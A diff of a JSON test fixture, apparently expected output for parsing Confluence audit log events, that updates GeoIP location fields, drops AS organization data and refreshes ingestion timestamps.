@@ -11386,20 +10690,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11407,7 +10705,7 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-08T15:08:08.222597837Z", + "ingested": "2021-12-14T14:34:31.513251265Z", "original": "{\"timestamp\":\"2021-11-23T00:39:36.323Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11476,20 +10774,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11497,7 +10789,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222599710Z", + "ingested": "2021-12-14T14:34:31.513251662Z", "original": "{\"timestamp\":\"2021-11-23T00:39:11.067Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"52 - 61\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:39:11.057109Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.299Z - 2021-11-23T00:38:58.965Z\"}]}", "type": "info", "kind": "event" @@ -11566,20 +10858,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11587,7 +10873,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222601597Z", + "ingested": "2021-12-14T14:34:31.513252107Z", "original": "{\"timestamp\":\"2021-11-23T00:38:58.965Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"60 - 60\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:58.959089Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"1\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:38:57.393Z - 2021-11-23T00:38:57.393Z\"}]}", "type": "info", "kind": "event" @@ -11656,20 +10942,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11677,7 +10957,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222603595Z", + "ingested": "2021-12-14T14:34:31.513252495Z", "original": "{\"timestamp\":\"2021-11-23T00:38:57.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 59\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:57.380777Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"11\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:42.240Z\"}]}", "type": "info", "kind": "event" @@ -11746,20 +11026,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11767,7 +11041,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222605479Z", + "ingested": "2021-12-14T14:34:31.513252989Z", "original": "{\"timestamp\":\"2021-11-23T00:38:42.240Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 58\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:42.224135Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:35.211Z\"}]}", "type": "info", "kind": "event" @@ -11836,20 +11110,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11857,7 +11125,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222607376Z", + "ingested": "2021-12-14T14:34:31.513253495Z", "original": "{\"timestamp\":\"2021-11-23T00:38:35.211Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:35.065543Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:35:04.387Z\"}]}", "type": "info", "kind": "event" @@ -11872,6 +11140,7 @@ ] }, { + "@timestamp": "2021-11-23T00:35:04.387Z", "confluence": { "audit": { "method": "System", @@ -11890,7 +11159,6 @@ ] } }, - "@timestamp": "2021-11-23T00:35:04.387Z", "ecs": { "version": "1.12.0" }, @@ -11904,7 +11172,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-08T15:08:08.222609252Z", + "ingested": "2021-12-14T14:34:31.513253970Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.387Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Retention\",\"i18nKey\":\"atlassian.audit.event.change.retention\",\"to\":\"3 Years\"}],\"system\":\"http://confluence.internal:8090\",\"method\":\"System\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11984,20 +11252,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12005,7 +11267,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222611108Z", + "ingested": "2021-12-14T14:34:31.513254416Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.306Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12086,20 +11348,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12107,7 +11363,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222613004Z", + "ingested": "2021-12-14T14:34:31.513254897Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.305Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12181,20 +11437,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12202,7 +11452,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222614876Z", + "ingested": "2021-12-14T14:34:31.513255278Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.303Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12283,20 +11533,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12304,7 +11548,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222616758Z", + "ingested": "2021-12-14T14:34:31.513255663Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.301Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12385,20 +11629,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12406,7 +11644,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222618643Z", + "ingested": "2021-12-14T14:34:31.513256070Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.299Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12480,20 +11718,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12501,7 +11733,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222620503Z", + "ingested": "2021-12-14T14:34:31.513256458Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.298Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12582,20 +11814,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12603,7 +11829,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222622378Z", + "ingested": "2021-12-14T14:34:31.513256860Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.296Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12684,20 +11910,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12705,7 +11925,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222624381Z", + "ingested": "2021-12-14T14:34:31.513257257Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.294Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12779,20 +11999,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12800,7 +12014,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222626278Z", + "ingested": "2021-12-14T14:34:31.513257639Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.292Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12881,20 +12095,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -12902,7 +12110,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222628148Z", + "ingested": "2021-12-14T14:34:31.513258031Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.290Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 